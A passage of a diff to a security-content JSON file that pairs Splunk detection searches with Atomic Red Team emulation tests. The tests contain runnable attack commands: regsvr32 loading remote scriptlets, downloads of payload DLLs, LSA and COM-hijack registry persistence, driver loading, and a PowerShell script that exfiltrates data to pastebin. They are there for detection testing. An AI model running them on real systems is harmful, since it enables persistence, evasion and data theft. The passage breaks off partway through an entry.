`azure_ad_multi_factor_authentication_disabled_filter`", + "search": "`azuread` category=AuditLogs operationName=\"Disable Strong Authentication\" | rename properties.* as * | rename targetResources{}.userPrincipalName as userPrincipalName | rename targetResources{}.type as type | rename initiatedBy.user.userPrincipalName as initiatedBy | stats values(userPrincipalName) as userPrincipalName by _time, type, operationName, initiatedBy, result | `azure_ad_multi_factor_authentication_disabled_filter`", "tags": { "name": "Azure AD Multi-Factor Authentication Disabled", "analytic_story": [ @@ -530481,7 +536174,7 @@ { "name": "Azure AD New MFA Method Registered For User", "description": "The following analytic identifies the registration of a new Multi Factor authentication method for an Azure AD account. Adversaries who have obtained unauthorized access to an Azure AD account may register a new MFA method to maintain persistence.", - "search": " `azuread` category=AuditLogs operationName=\"User registered security info\" properties.operationType=Add | rename properties.* as * | rename targetResources{}.* as * | stats values(userPrincipalName) by _time, resultDescription, result, callerIpAddress | `azure_ad_new_mfa_method_registered_for_user_filter`", + "search": " `azuread` category=AuditLogs operationName=\"User registered security info\" properties.operationType=Add | rename properties.* as * | rename targetResources{}.* as * | stats values(userPrincipalName) as userPrincipalName by _time, resultDescription, result, callerIpAddress | `azure_ad_new_mfa_method_registered_for_user_filter`", "tags": { "name": "Azure AD New MFA Method Registered For User", "analytic_story": [ @@ -532940,7 +538633,7 @@ ] }, { - "name": "Computer", + "name": "dest", "type": "Hostname", "role": [ "Victim" @@ -533755,23 +539448,23 @@ "dependencies": [ { "description": "MSI file must exist on disk at specified location (#{msi_file_path})\n", - "prereq_command": "if (Test-Path #{msi_file_path}) {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory (split-path #{msi_file_path}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1564.006/bin/Virtualbox_52.msi\" -OutFile \"#{msi_file_path}\"\n" + "prereq_command": "if (Test-Path \"#{msi_file_path}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path \"#{msi_file_path}\") -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1564.006/bin/Virtualbox_52.msi\" -OutFile \"#{msi_file_path}\"\n" }, { "description": "CAB file must exist on disk at specified location (#{cab_file_path})\n", - "prereq_command": "if (Test-Path #{cab_file_path}) {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory (split-path #{cab_file_path}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1564.006/bin/common.cab\" -OutFile \"#{cab_file_path}\" \n" + "prereq_command": "if (Test-Path \"#{cab_file_path}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path \"#{cab_file_path}\") -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1564.006/bin/common.cab\" -OutFile \"#{cab_file_path}\" \n" }, { "description": "Old version of Virtualbox must be installed\n", "prereq_command": "if (Test-Path \"C:\\Program Files\\Oracle\\VirtualBox\\VboxC.dll\") {exit 0} else {exit 1}\n", - "get_prereq_command": "msiexec /i #{msi_file_path} /qn\n" + "get_prereq_command": "msiexec /i \"#{msi_file_path}\" /qn\n" } ], "executor": { "command": "\"C:\\Program Files\\Oracle\\VirtualBox\\VBoxSVC.exe\" /reregserver\nregsvr32 /S \"C:\\Program Files\\Oracle\\VirtualBox\\VboxC.dll\"\nrundll32 \"C:\\Program Files\\Oracle\\VirtualBox\\VBoxRT.dll,RTR3Init\"\nsc create VBoxDRV binpath= \"C:\\Program Files\\Oracle\\VirtualBox\\drivers\\VboxDrv.sys\" type= kernel start= auto error= normal displayname= PortableVBoxDRV\nsc start VBoxDRV\n", - "cleanup_command": "sc stop VBoxDRV\nsc delete VBoxDRV\nregsvr32 /u /S \"C:\\Program Files\\Oracle\\VirtualBox\\VboxC.dll\"\nmsiexec /x #{msi_file_path} /qn\n", + "cleanup_command": "sc stop VBoxDRV\nsc delete VBoxDRV\nregsvr32 /u /S \"C:\\Program Files\\Oracle\\VirtualBox\\VboxC.dll\"\nmsiexec /x \"#{msi_file_path}\" /qn\n", "name": "command_prompt" } }, @@ -534999,14 +540692,7 @@ ], "observable": [ { - "name": "src_ip", - "type": "IP Address", - "role": [ - "Attacker" - ] - }, - { - "name": "user_arn", + "name": "user_name", "type": "User", "role": [ "Attacker" @@ -536482,7 +542168,7 @@ { "name": "Detect WMI Event Subscription Persistence", "description": "The following analytic identifies the use of WMI Event Subscription to establish persistence or perform privilege escalation. WMI can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. WMI subscription execution is proxied by the WMI Provider Host process (WmiPrvSe.exe) and thus may result in elevated SYSTEM privileges. This analytic is restricted by commonly added process execution and a path. If the volume is low enough, remove the values and flag on any new subscriptions.\\\nAll event subscriptions have three components \\\n1. Filter - WQL Query for the events we want. EventID equals 19 \\\n1. Consumer - An action to take upon triggering the filter. EventID equals 20 \\\n1. Binding - Registers a filter to a consumer. EventID equals 21 \\\nMonitor for the creation of new WMI EventFilter, EventConsumer, and FilterToConsumerBinding. It may be pertinent to review all 3 to identify the flow of execution. In addition, EventCode 4104 may assist with any other PowerShell script usage that registered the subscription.", - "search": "`sysmon` EventID=20 | stats count min(_time) as firstTime max(_time) as lastTime by Computer User Destination | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_wmi_event_subscription_persistence_filter`", + "search": "`sysmon` EventID=20 | stats count min(_time) as firstTime max(_time) as lastTime by Computer User Destination | rename Computer as dest | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_wmi_event_subscription_persistence_filter`", "tags": { "name": "Detect WMI Event Subscription Persistence", "analytic_story": [ @@ -536676,7 +542362,8 @@ "analytic_story": [ "Data Destruction", "Hermetic Wiper", - "Windows Privilege Escalation" + "Windows Privilege Escalation", + "Flax Typhoon" ], "asset_type": "Endpoint", "cis20": [ @@ -536882,7 +542569,7 @@ { "name": "Registry Keys for Creating SHIM Databases", "description": "This search looks for registry activity associated with application compatibility shims, which can be leveraged by attackers for various nefarious purposes.", - "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path=*CurrentVersion\\\\AppCompatFlags\\\\Custom* OR Registry.registry_path=*CurrentVersion\\\\AppCompatFlags\\\\InstalledSDB*) BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `registry_keys_for_creating_shim_databases_filter`", + "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path=*CurrentVersion\\\\AppCompatFlags\\\\Custom* OR Registry.registry_path=*CurrentVersion\\\\AppCompatFlags\\\\InstalledSDB*) BY _time span=1h Registry.dest Registry.user Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `registry_keys_for_creating_shim_databases_filter`", "tags": { "name": "Registry Keys for Creating SHIM Databases", "analytic_story": [ @@ -536952,7 +542639,7 @@ { "name": "Registry Keys Used For Privilege Escalation", "description": "This search looks for modifications to registry keys that can be used to elevate privileges. The registry keys under \"Image File Execution Options\" are used to intercept calls to an executable and can be used to attach malicious binaries to benign system binaries.", - "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE ((Registry.registry_path=\"*Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options*\") AND (Registry.registry_value_name=GlobalFlag OR Registry.registry_value_name=Debugger)) BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `registry_keys_used_for_privilege_escalation_filter`", + "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE ((Registry.registry_path=\"*Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options*\") AND (Registry.registry_value_name=GlobalFlag OR Registry.registry_value_name=Debugger)) BY _time span=1h Registry.dest Registry.user Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `registry_keys_used_for_privilege_escalation_filter`", "tags": { "name": "Registry Keys Used For Privilege Escalation", "analytic_story": [ @@ -541545,7 +547232,7 @@ { "name": "Ransomware Notes bulk creation", "description": "The following analytics identifies a big number of instance of ransomware notes (filetype e.g .txt, .html, .hta) file creation to the infected machine. This behavior is a good sensor if the ransomware note filename is quite new for security industry or the ransomware note filename is not in your ransomware lookup table list for monitoring.", - "search": "`sysmon` EventCode=11 file_name IN (\"*\\.txt\",\"*\\.html\",\"*\\.hta\") |bin _time span=10s | stats min(_time) as firstTime max(_time) as lastTime dc(TargetFilename) as unique_readme_path_count values(TargetFilename) as list_of_readme_path by Computer Image file_name | where unique_readme_path_count >= 15 | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `ransomware_notes_bulk_creation_filter`", + "search": "`sysmon` EventCode=11 file_name IN (\"*\\.txt\",\"*\\.html\",\"*\\.hta\") |bin _time span=10s | stats min(_time) as firstTime max(_time) as lastTime dc(TargetFilename) as unique_readme_path_count values(TargetFilename) as list_of_readme_path by Computer Image file_name | rename Computer as dest | where unique_readme_path_count >= 15 | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `ransomware_notes_bulk_creation_filter`", "tags": { "name": "Ransomware Notes bulk creation", "analytic_story": [ @@ -541562,7 +547249,7 @@ "kill_chain_phases": [ "Actions on Objectives" ], - "message": "A high frequency file creation of $file_name$ in different file path in host $Computer$", + "message": "A high frequency file creation of $file_name$ in different file path in host $dest$", "mitre_attack_id": [ "T1486" ], @@ -541571,18 +547258,11 @@ ], "observable": [ { - "name": "Computer", + "name": "dest", "type": "Hostname", "role": [ "Victim" ] - }, - { - "name": "user", - "type": "User", - "role": [ - "Victim" - ] } ], "risk_score": 81, @@ -542662,7 +548342,7 @@ { "name": "Attempt To Add Certificate To Untrusted Store", "description": "The following analytic is designed to detect potential security threats involving the misuse of system trust. It works by detecting events where a process attempts to add a certificate to the untrusted certificate store, an action often associated with disabling security tools. The analytic uses Sysmon Event ID 1 data source, particularly focusing on process activities and command-line arguments related to 'certutil -addstore'. It's essential to ingest data that records process activity and logs containing process names and command lines for its effective operation. Be aware, sometimes administrators might legitimately perform this action. The analytic's value lies in detecting isolated or unexpected instances, indicative of potential malicious activities. Cybersecurity analysts should understand the importance of trust mechanisms and their subversion in system security.", - "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime values(Processes.process) as process max(_time) as lastTime from datamodel=Endpoint.Processes where `process_certutil` (Processes.process=*-addstore*) by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(\"Processes\")` | `security_content_ctime(firstTime)` |`security_content_ctime(lastTime)` | `attempt_to_add_certificate_to_untrusted_store_filter`", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime values(Processes.process) as process max(_time) as lastTime from datamodel=Endpoint.Processes where `process_certutil` (Processes.process=*-addstore*) by Processes.dest Processes.user Processes.parent_process Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(\"Processes\")` | `security_content_ctime(firstTime)` |`security_content_ctime(lastTime)` | `attempt_to_add_certificate_to_untrusted_store_filter`", "tags": { "name": "Attempt To Add Certificate To Untrusted Store", "analytic_story": [ @@ -543923,7 +549603,7 @@ } ], "command_list": [ - "Copy-Item $PathToAtomicsFolder\\T1547.002\\bin\\package.dll C:\\Windows\\System32\\\nreg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa\" /v \"Authentication Packages\" /t REG_MULTI_SZ /d \"msv1_0\\0package.dll\" /f\n" + "Copy-Item \"$PathToAtomicsFolder\\T1547.002\\bin\\package.dll\" C:\\Windows\\System32\\\nreg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa\" /v \"Authentication Packages\" /t REG_MULTI_SZ /d \"msv1_0\\0package.dll\" /f\n" ], "commands": [], "queries": [], @@ -543943,7 +549623,7 @@ "windows" ], "executor": { - "command": "Copy-Item $PathToAtomicsFolder\\T1547.002\\bin\\package.dll C:\\Windows\\System32\\\nreg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa\" /v \"Authentication Packages\" /t REG_MULTI_SZ /d \"msv1_0\\0package.dll\" /f\n", + "command": "Copy-Item \"$PathToAtomicsFolder\\T1547.002\\bin\\package.dll\" C:\\Windows\\System32\\\nreg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa\" /v \"Authentication Packages\" /t REG_MULTI_SZ /d \"msv1_0\\0package.dll\" /f\n", "cleanup_command": "reg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa\" /v \"Authentication Packages\" /t REG_MULTI_SZ /d \"msv1_0\" /f\nrm -force C:\\windows\\system32\\package.dll\n", "name": "powershell", "elevation_required": true @@ -544322,11 +550002,11 @@ } ], "command_list": [ - "C:\\Windows\\system32\\regsvr32.exe /s /u /i:\\T1218.010\\src\\RegSvr32.sct scrobj.dll\n", + "C:\\Windows\\system32\\regsvr32.exe /s /u /i:\"\\T1218.010\\src\\RegSvr32.sct\" scrobj.dll\n", "C:\\Windows\\system32\\regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct scrobj.dll\n", "IF \"%PROCESSOR_ARCHITECTURE%\"==\"AMD64\" (C:\\Windows\\syswow64\\regsvr32.exe /s \\T1218.010\\bin\\AllTheThingsx86.dll) ELSE ( C:\\Windows\\system32\\regsvr32.exe /s \\T1218.010\\bin\\AllTheThingsx86.dll )\n", "C:\\Windows\\system32\\regsvr32.exe /s %temp%\\shell32.jpg\n", - "C:\\Windows\\system32\\regsvr32.exe /s /i \\T1218.010\\bin\\AllTheThingsx86.dll" + "C:\\Windows\\system32\\regsvr32.exe /s /i \"\\T1218.010\\bin\\AllTheThingsx86.dll\"\n" ], "commands": [], "queries": [], @@ -544366,12 +550046,12 @@ "dependencies": [ { "description": "Regsvr32.sct must exist on disk at specified location (#{filename})\n", - "prereq_command": "if (Test-Path #{filename}) {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory (split-path #{filename}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.010/src/RegSvr32.sct\" -OutFile \"#{filename}\"\n" + "prereq_command": "if (Test-Path \"#{filename}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path \"#{filename}\") -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.010/src/RegSvr32.sct\" -OutFile \"#{filename}\"\n" } ], "executor": { - "command": "#{regsvr32path}\\#{regsvr32name} /s /u /i:#{filename} scrobj.dll\n", + "command": "#{regsvr32path}\\#{regsvr32name} /s /u /i:\"#{filename}\" scrobj.dll\n", "name": "command_prompt" } }, @@ -544432,8 +550112,8 @@ "dependencies": [ { "description": "AllTheThingsx86.dll must exist on disk at specified location (#{dll_name})\n", - "prereq_command": "if (Test-Path #{dll_name}) {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory (split-path #{dll_name}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.010/bin/AllTheThingsx86.dll\" -OutFile \"#{dll_name}\"\n" + "prereq_command": "if (Test-Path \"#{dll_name}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path \"#{dll_name}\") -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.010/bin/AllTheThingsx86.dll\" -OutFile \"#{dll_name}\"\n" } ], "executor": { @@ -544508,12 +550188,12 @@ "dependencies": [ { "description": "AllTheThingsx86.dll must exist on disk at specified location (#{dll_name})", - "prereq_command": "if (Test-Path #{dll_name}) {exit 0} else {exit 1}", - "get_prereq_command": "New-Item -Type Directory (split-path #{dll_name}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.010/bin/AllTheThingsx86.dll\" -OutFile \"#{dll_name}\"" + "prereq_command": "if (Test-Path \"#{dll_name}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path \"#{dll_name}\") -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.010/bin/AllTheThingsx86.dll\" -OutFile \"#{dll_name}\"" } ], "executor": { - "command": "#{regsvr32path}\\#{regsvr32name} /s /i #{dll_name}", + "command": "#{regsvr32path}\\#{regsvr32name} /s /i \"#{dll_name}\"\n", "name": "command_prompt" } } @@ -546107,7 +551787,7 @@ { "name": "Detect Regsvr32 Application Control Bypass", "description": "Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary.This variation of the technique is often referred to as a \"Squiblydoo\" attack. \\\nUpon investigating, look for network connections to remote destinations (internal or external). Be cautious to modify the query to look for \"scrobj.dll\", the \".dll\" is not required to load scrobj. \"scrobj.dll\" will be loaded by \"regsvr32.exe\" upon execution. ", - "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_regsvr32` Processes.process=*scrobj* by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.original_file_name Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `detect_regsvr32_application_control_bypass_filter`", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_regsvr32` Processes.process=*scrobj* by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.parent_process_name Processes.process Processes.original_file_name Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `detect_regsvr32_application_control_bypass_filter`", "tags": { "name": "Detect Regsvr32 Application Control Bypass", "analytic_story": [ @@ -546487,7 +552167,7 @@ { "name": "Suspicious Regsvr32 Register Suspicious Path", "description": "Adversaries may abuse Regsvr32.exe to proxy execution of malicious code by using non-standard file extensions to load DLLs. Upon investigating, look for network connections to remote destinations (internal or external). Review additional parrallel processes and child processes for additional activity.", - "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_regsvr32` Processes.process IN (\"*\\\\appdata\\\\*\", \"*\\\\programdata\\\\*\",\"*\\\\windows\\\\temp\\\\*\") NOT (Processes.process IN (\"*.dll*\", \"*.ax*\", \"*.ocx*\")) by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.original_file_name Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `suspicious_regsvr32_register_suspicious_path_filter`", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_regsvr32` Processes.process IN (\"*\\\\appdata\\\\*\", \"*\\\\programdata\\\\*\",\"*\\\\windows\\\\temp\\\\*\") NOT (Processes.process IN (\"*.dll*\", \"*.ax*\", \"*.ocx*\")) by Processes.dest Processes.user Processes.parent_process_name Processes.parent_process Processes.process_name Processes.process Processes.original_file_name Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `suspicious_regsvr32_register_suspicious_path_filter`", "tags": { "name": "Suspicious Regsvr32 Register Suspicious Path", "analytic_story": [ @@ -547171,10 +552851,43 @@ "phase_name": "exfiltration" } ], - "command_list": [], + "command_list": [ + "$apiKey = \"6nxrBm7UIJuaEuPOkH5Z8I7SvCLN3OP0\"\n$content = \"secrets, api keys, passwords...\"\n$url = \"https://pastebin.com/api/api_post.php\"\n$postData = @{\n api_dev_key = $apiKey\n api_option = \"paste\"\n api_paste_code = $content\n}\n$response = Invoke-RestMethod -Uri $url -Method Post -Body $postData\nWrite-Host \"Your paste URL: $response\"\n" + ], "commands": [], "queries": [], - "parsed_datasets": [], + "parsed_datasets": [ + { + "source": "atomics/T1567.003/T1567.003.yaml", + "name": "Atomic Red Team Test - Exfiltration Over Web Service: Exfiltration to Text Storage Sites", + "content": { + "attack_technique": "T1567.003", + "display_name": "Exfiltration Over Web Service: Exfiltration to Text Storage Sites", + "atomic_tests": [ + { + "name": "Exfiltrate data with HTTP POST to text storage sites - pastebin.com (Windows)", + "auto_generated_guid": "c2e8ab6e-431e-460a-a2aa-3bc6a32022e3", + "description": "This test uses HTTP POST to exfiltrate data to a remote text storage site. (pastebin) \nSee https://web.archive.org/web/20201107203304/https://www.echosec.net/blog/what-is-pastebin-and-why-do-hackers-love-it \n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "api_key": { + "description": "Pastebin API key", + "type": "string", + "default": "6nxrBm7UIJuaEuPOkH5Z8I7SvCLN3OP0" + } + }, + "executor": { + "command": "$apiKey = \"#{api_key}\"\n$content = \"secrets, api keys, passwords...\"\n$url = \"https://pastebin.com/api/api_post.php\"\n$postData = @{\n api_dev_key = $apiKey\n api_option = \"paste\"\n api_paste_code = $content\n}\n$response = Invoke-RestMethod -Uri $url -Method Post -Body $postData\nWrite-Host \"Your paste URL: $response\"\n", + "name": "powershell", + "elevation_required": false + } + } + ] + } + } + ], "possible_detections": [], "external_reference": [], "controls": [], @@ -548664,9 +554377,9 @@ } ], "command_list": [ - "New-Item -Path 'HKCU:\\SOFTWARE\\Classes\\CLSID\\{B5F8350B-0548-48B1-A6EE-88BD00B4A5E7}' -Value 'MSAA AccPropServices'\nNew-Item -Path 'HKCU:\\SOFTWARE\\Classes\\CLSID\\{B5F8350B-0548-48B1-A6EE-88BD00B4A5E7}\\InprocServer32' -Value \\..\\ExternalPayloads\\AtomicTest.dll\nNew-ItemProperty -Path 'HKCU:\\SOFTWARE\\Classes\\CLSID\\{B5F8350B-0548-48B1-A6EE-88BD00B4A5E7}\\InprocServer32' -Name 'ThreadingModel' -Value 'Apartment' -PropertyType \"String\"\nStart-Process -FilePath \"C:\\Windows\\System32\\RUNDLL32.EXE\" -ArgumentList '-sta {B5F8350B-0548-48B1-A6EE-88BD00B4A5E7}'", + "New-Item -Path 'HKCU:\\SOFTWARE\\Classes\\CLSID\\{B5F8350B-0548-48B1-A6EE-88BD00B4A5E7}' -Value 'MSAA AccPropServices'\nNew-Item -Path 'HKCU:\\SOFTWARE\\Classes\\CLSID\\{B5F8350B-0548-48B1-A6EE-88BD00B4A5E7}\\InprocServer32' -Value \"\\..\\ExternalPayloads\\AtomicTest.dll\"\nNew-ItemProperty -Path 'HKCU:\\SOFTWARE\\Classes\\CLSID\\{B5F8350B-0548-48B1-A6EE-88BD00B4A5E7}\\InprocServer32' -Name 'ThreadingModel' -Value 'Apartment' -PropertyType \"String\"\nStart-Process -FilePath \"C:\\Windows\\System32\\RUNDLL32.EXE\" -ArgumentList '-sta {B5F8350B-0548-48B1-A6EE-88BD00B4A5E7}'", "$o= [activator]::CreateInstance([type]::GetTypeFromCLSID(\"9BA05972-F6A8-11CF-A442-00A0C90A8F39\"))\n$item = $o.Item()\n$item.Document.Application.ShellExecute(\"cmd.exe\",\"/c calc.exe\",\"C:\\windows\\system32\",$null,0)\n", - "New-Item -Path 'HKCU:\\SOFTWARE\\Classes\\CLSID\\{B5F8350B-0548-48B1-A6EE-88BD00B4A5E7}' -Value 'MSAA AccPropServices'\nNew-Item -Path 'HKCU:\\SOFTWARE\\Classes\\CLSID\\{B5F8350B-0548-48B1-A6EE-88BD00B4A5E7}\\InprocServer32' -Value \\..\\ExternalPayloads\\T1546.015_calc.dll\nNew-ItemProperty -Path 'HKCU:\\SOFTWARE\\Classes\\CLSID\\{B5F8350B-0548-48B1-A6EE-88BD00B4A5E7}\\InprocServer32' -Name 'ThreadingModel' -Value 'Both' -PropertyType \"String\"\nStart-Process -FilePath \"C:\\Windows\\System32\\RUNDLL32.EXE\" -ArgumentList '-localserver {B5F8350B-0548-48B1-A6EE-88BD00B4A5E7}'", + "New-Item -Path 'HKCU:\\SOFTWARE\\Classes\\CLSID\\{B5F8350B-0548-48B1-A6EE-88BD00B4A5E7}' -Value 'MSAA AccPropServices'\nNew-Item -Path 'HKCU:\\SOFTWARE\\Classes\\CLSID\\{B5F8350B-0548-48B1-A6EE-88BD00B4A5E7}\\InprocServer32' -Value \"\\..\\ExternalPayloads\\T1546.015_calc.dll\"\nNew-ItemProperty -Path 'HKCU:\\SOFTWARE\\Classes\\CLSID\\{B5F8350B-0548-48B1-A6EE-88BD00B4A5E7}\\InprocServer32' -Name 'ThreadingModel' -Value 'Both' -PropertyType \"String\"\nStart-Process -FilePath \"C:\\Windows\\System32\\RUNDLL32.EXE\" -ArgumentList '-localserver {B5F8350B-0548-48B1-A6EE-88BD00B4A5E7}'", "reg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\AtomicTest\" /ve /T REG_SZ /d \"AtomicTest\" /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\AtomicTest.1.00\" /ve /T REG_SZ /d \"AtomicTest\" /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\AtomicTest\\CLSID\" /ve /T REG_SZ /d \"{00000001-0000-0000-0000-0000FEEDACDC}\" /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\AtomicTest.1.00\\CLSID\" /ve /T REG_SZ /d \"{00000001-0000-0000-0000-0000FEEDACDC}\" /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{00000001-0000-0000-0000-0000FEEDACDC}\" /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{00000001-0000-0000-0000-0000FEEDACDC}\" /ve /T REG_SZ /d \"AtomicTest\" /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{00000001-0000-0000-0000-0000FEEDACDC}\\InprocServer32\" /ve /T REG_SZ /d \"C:\\WINDOWS\\system32\\scrobj.dll\" /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{00000001-0000-0000-0000-0000FEEDACDC}\\InprocServer32\" /v \"ThreadingModel\" /T REG_SZ /d \"Apartment\" /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{00000001-0000-0000-0000-0000FEEDACDC}\\ProgID\" /ve /T REG_SZ /d \"AtomicTest\" /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{00000001-0000-0000-0000-0000FEEDACDC}\\ScriptletURL\" /ve /T REG_SZ /d \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/src/TreatAs.sct\" /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{00000001-0000-0000-0000-0000FEEDACDC}\\VersionIndependentProgID\" /ve /T REG_SZ /d \"AtomicTest\" /f\n\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}\" /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}\\TreatAs\" /ve /T REG_SZ /d \"{00000001-0000-0000-0000-0000FEEDACDC}\" /f\n\nrundll32.exe -sta \"AtomicTest\" " ], "commands": [], @@ -548712,12 +554425,12 @@ "dependencies": [ { "description": "DLL For testing", - "prereq_command": "if (Test-Path #{dllpath}) {exit 0} else {exit 1}", + "prereq_command": "if (Test-Path \"#{dllpath}\") {exit 0} else {exit 1}", "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/bin/AtomicTest.dll\" -OutFile \"#{dllpath}\"\n" } ], "executor": { - "command": "New-Item -Path 'HKCU:\\SOFTWARE\\Classes\\CLSID\\#{clsid}' -Value '#{clsid_description}'\nNew-Item -Path 'HKCU:\\SOFTWARE\\Classes\\CLSID\\#{clsid}\\InprocServer32' -Value #{dllpath}\nNew-ItemProperty -Path 'HKCU:\\SOFTWARE\\Classes\\CLSID\\#{clsid}\\InprocServer32' -Name 'ThreadingModel' -Value '#{clsid_threading}' -PropertyType \"String\"\nStart-Process -FilePath \"C:\\Windows\\System32\\RUNDLL32.EXE\" -ArgumentList '-sta #{clsid}'", + "command": "New-Item -Path 'HKCU:\\SOFTWARE\\Classes\\CLSID\\#{clsid}' -Value 